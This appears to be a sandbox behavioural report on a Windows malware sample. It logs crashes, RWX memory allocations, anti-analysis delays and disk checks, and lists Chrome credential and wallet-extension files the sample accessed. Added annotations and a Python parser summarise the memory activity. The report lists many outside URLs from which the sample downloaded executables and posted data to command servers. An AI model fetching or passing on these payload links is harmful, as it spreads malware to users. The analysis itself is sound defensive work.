exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12041364
registers.edi: 0
registers.eax: 0
registers.ebp: 12041404
registers.edx: 32
registers.ebx: 12041708
registers.esi: 0
registers.ecx: 64162720
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb129e
0x3bb15cd
0x3bc8929
0x3bedd51
0x3bf7154
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12041364
registers.edi: 0
registers.eax: 0
registers.ebp: 12041404
registers.edx: 32
registers.ebx: 12041708
registers.esi: 0
registers.ecx: 64162720
1 0 0

__exception__

stacktrace:
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 59 79 3b
exception.symbol: csotxvbhujdrvtrgizng8f7v+0x1016
exception.instruction: mov dword ptr [eax], ecx
exception.module: CsOtXVBhUjDrvtRgizng8F7v.exe
exception.exception_code: 0xc0000005
exception.offset: 4118
exception.address: 0x101016
registers.esp: 9173700
registers.edi: 0
registers.eax: 0
registers.ebp: 9173716
registers.edx: 1052672
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x544d18
0x4b2e0a
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

exception.instruction_r: 18 4d 54 00 00 00 00 00 18 4d 54 00 00 00 00 00
exception.instruction: sbb byte ptr [rbp + 0x54], cl
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x544d18
registers.r14: 183561024
registers.r15: 183561464
registers.rcx: 1432
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 76853824
registers.rsp: 183560200
registers.r11: 183564720
registers.r8: 1999536524
registers.r9: 0
registers.rdx: 1476
registers.r12: 34322784
registers.rbp: 183560336
registers.rdi: 34059328
registers.rax: 4926976
registers.r13: 183560896
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://45.133.1.182/proxies.txt
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://37.0.8.119/service/communication.php
suspicious_features Connection to IP address suspicious_request GET http://37.0.8.119/base/api/statistics.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://37.0.8.119/base/api/getData.php
suspicious_features Connection to IP address suspicious_request HEAD http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features Connection to IP address suspicious_request GET http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features Connection to IP address suspicious_request HEAD http://194.145.227.159/pub.php?pub=two
suspicious_features Connection to IP address suspicious_request GET http://194.145.227.159/pub.php?pub=two
suspicious_features Connection to IP address suspicious_request GET http://186.2.171.3/seemorebty/il.php?e=CsOtXVBhUjDrvtRgizng8F7v
suspicious_features POST method with no referer header suspicious_request POST http://www.cjnovone.top/Home/Index/lkdinl
suspicious_features GET method with no useragent header suspicious_request GET http://safialinks.com/Widgets/FolderShare.exe
suspicious_features GET method with no useragent header suspicious_request GET http://safialinks.com/xJRtjaHLw25uhP75sj4j5SDQa3dAyG/BestCPM/Soft_Manager_Cpm.exe
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST https://connectini.net/Series/SuperNitou.php
request GET http://45.133.1.182/proxies.txt
request POST http://37.0.8.119/service/communication.php
request GET http://37.0.8.119/base/api/statistics.php
request POST http://37.0.8.119/base/api/getData.php
request HEAD http://45.133.1.107/download/NiceProcessX64.bmp
request GET http://45.133.1.107/download/NiceProcessX64.bmp
request HEAD http://194.145.227.159/pub.php?pub=two
request HEAD http://threesmallhills.com/pub3.exe
request HEAD http://www.nqhobby.com/askhelp58/askinstall58.exe
request HEAD http://ukcom.pw/adsli/md7_7dfj.exe
request HEAD http://install-cb.ru/CalcCryptoInstalww.exe
request GET http://threesmallhills.com/pub3.exe
request GET http://ukcom.pw/adsli/md7_7dfj.exe
request GET http://194.145.227.159/pub.php?pub=two
request HEAD http://www.nqhobby.com/askinstall58.exe
request GET http://install-cb.ru/CalcCryptoInstalww.exe
request GET http://www.nqhobby.com/askhelp58/askinstall58.exe
request GET http://www.nqhobby.com/askinstall58.exe
request GET http://186.2.171.3/seemorebty/il.php?e=CsOtXVBhUjDrvtRgizng8F7v
request GET http://www.iyiqian.com/
request POST http://www.cjnovone.top/Home/Index/lkdinl
request HEAD http://safialinks.com/Installer_Provider/ShareFolder.exe
request GET http://safialinks.com/Installer_Provider/ShareFolder.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://safialinks.com/Widgets/FolderShare.exe
request GET http://safialinks.com/xJRtjaHLw25uhP75sj4j5SDQa3dAyG/BestCPM/Soft_Manager_Cpm.exe
request GET https://yandex.ru/
request GET https://ipinfo.io/widget
request GET https://cdn.discordapp.com/attachments/882087629896691744/894083102190764052/Cube_WW14.bmp
request GET https://cdn.discordapp.com/attachments/891021838312931420/895238855698051082/PL_Client.bmp
request GET https://cdn.discordapp.com/attachments/882087629896691744/890166075864543242/installer_2021-09-21_16-31.bmp
request GET https://cdn.discordapp.com/attachments/882087629896691744/890166081547825162/LivelyScreenRecLy2109.bmp
request GET https://dc-repository.com/sfx_123_207.exe
request GET https://www.listincode.com/
request GET https://iplogger.org/14Jup7
request GET https://publishersharef.s3.eu-north-1.amazonaws.com/Sharefolder.exe
request POST https://connectini.net/Series/SuperNitou.php
request POST http://37.0.8.119/service/communication.php
request POST http://37.0.8.119/base/api/getData.php
request POST http://www.cjnovone.top/Home/Index/lkdinl
request POST https://connectini.net/Series/SuperNitou.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1892
region_size: 1323008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03ba0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 2359296
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000008e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000aa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1321000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef19bb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002160000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002250000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b6a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b7c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c46000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b6b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b7a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b8d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91ce0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91ce1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cf0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cf1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cf2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cf3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
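Added example, not code from the ZeroBOX report: a Python parser for the Time & API trace entries in the layout above, aggregating per process how many PAGE_EXECUTE_READWRITE allocations were made, how many bytes were actually committed RWX (a MEM_RESERVE call on its own backs nothing), which pages NtProtectVirtualMemory flipped to RWX, and how often the monitor raised heap_dep_bypass. The embedded trace copies four records from the entries above (with the always-zero stack_dep_bypass and stack_pivoted fields dropped to keep it short) and adds one constructed PAGE_READWRITE allocation for contrast.

```python
import re

# Constructed excerpt in the report's own layout: four records copied from the
# trace above plus one PAGE_READWRITE allocation added for contrast.
SAMPLE_TRACE = """
NtAllocateVirtualMemory

process_identifier: 1892
region_size: 1323008
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03ba0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 2359296
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000008e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 8192
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000aa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 65536
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x0000000003000000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
"""

STATUS_LINE = re.compile(r'^\d+(?: \d+){1,2}$')   # "status return repeated" or "status return"

def parse_trace(text):
    """Turn the report's 'API / key: value / status return repeated' blocks into dicts."""
    records, cur = [], None
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if STATUS_LINE.match(line):                    # closes the current record
            nums = [int(n) for n in line.split()]
            cur['status'], cur['return'] = nums[0], nums[1]
            cur['repeated'] = nums[2] if len(nums) > 2 else 0
            records.append(cur)
            cur = None
        elif ':' in line:                               # argument line
            key, _, value = line.partition(':')
            cur[key.strip()] = value.strip()
        else:                                           # bare API name opens a record
            cur = {'api': line}
    return records

PAGE_EXECUTE_READWRITE = 0x40

def rwx_summary(records):
    """Per-PID view of writable-and-executable memory activity."""
    out = {}
    for r in records:
        if int(r.get('protection', '0').split()[0]) != PAGE_EXECUTE_READWRITE:
            continue
        s = out.setdefault(int(r['process_identifier']), {
            'alloc_calls': 0, 'committed_rwx_bytes': 0,
            'reprotected_pages': set(), 'dep_bypass_flags': 0})
        if r['api'] == 'NtAllocateVirtualMemory':
            s['alloc_calls'] += 1
            if 'MEM_COMMIT' in r['allocation_type']:   # MEM_RESERVE alone backs nothing
                s['committed_rwx_bytes'] += int(r['region_size'])
        elif r['api'] == 'NtProtectVirtualMemory':
            s['reprotected_pages'].add(int(r['base_address'], 16))
        s['dep_bypass_flags'] += int(r.get('heap_dep_bypass', '0'))
    return out

def flagged_pids(summary):
    """PIDs that ended up with RWX pages actually backed by memory."""
    return sorted(pid for pid, s in summary.items()
                  if s['committed_rwx_bytes'] or s['reprotected_pages'])
```

Run against the full trace above, the same summary shows pid 2080 re-protecting the same 0x000007fef1322000 page over and over (a set keeps that as one page) and committing 4 KiB RWX chunks across the 0x7fe91b6xxxx range, which is the pattern of code being written into a loaded module's address space page by page.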
description u7bmZ_Jch5QWYEh3mRgkn8v4.exe tried to sleep 225 seconds, actually delayed analysis time by 225 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 8456473196824849641
root_path: C:\Program Files (x86)\My manager4youdrivers\
total_number_of_bytes: 4294967295
0 0
note: status 0 means this first call failed, so the byte counts it shows are unwritten output buffers and should not be read as disk figures; the successful call against C:\ below reports 34252779520 bytes total (about 31.9 GiB) and 13521285120 bytes free (about 12.6 GiB), the kind of values malware compares against a minimum to spot small analysis VMs.

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 13694136320
root_path: C:\Program Files (x86)\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13521285120
free_bytes_available: 13521285120
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
Application Crash: process chrome.exe with pid 3104 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x544d18
0x4b2e0a
0x30 (this value repeats for the remaining 62 frames)

exception.instruction_r: 18 4d 54 00 00 00 00 00 18 4d 54 00 00 00 00 00
exception.instruction: sbb byte ptr [rbp + 0x54], cl
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x544d18
note: the bytes at the faulting address, 18 4d 54 00 00 00 00 00, are the little-endian encoding of the address 0x544d18 itself, so execution landed in a data region holding a pointer to itself rather than in code; the sbb disassembly is only the decoder's reading of those bytes, and the run of 0x30 entries in the stacktrace is not a chain of code addresses.
registers.r14: 183561024
registers.r15: 183561464
registers.rcx: 1432
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 76853824
registers.rsp: 183560200
registers.r11: 183564720
registers.r8: 1999536524
registers.r9: 0
registers.rdx: 1476
registers.r12: 34322784
registers.rbp: 183560336
registers.rdi: 34059328
registers.rax: 4926976
registers.r13: 183560896
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\icon.png
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\content.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\pad-nopadding.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\3104-1633592404530000.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma
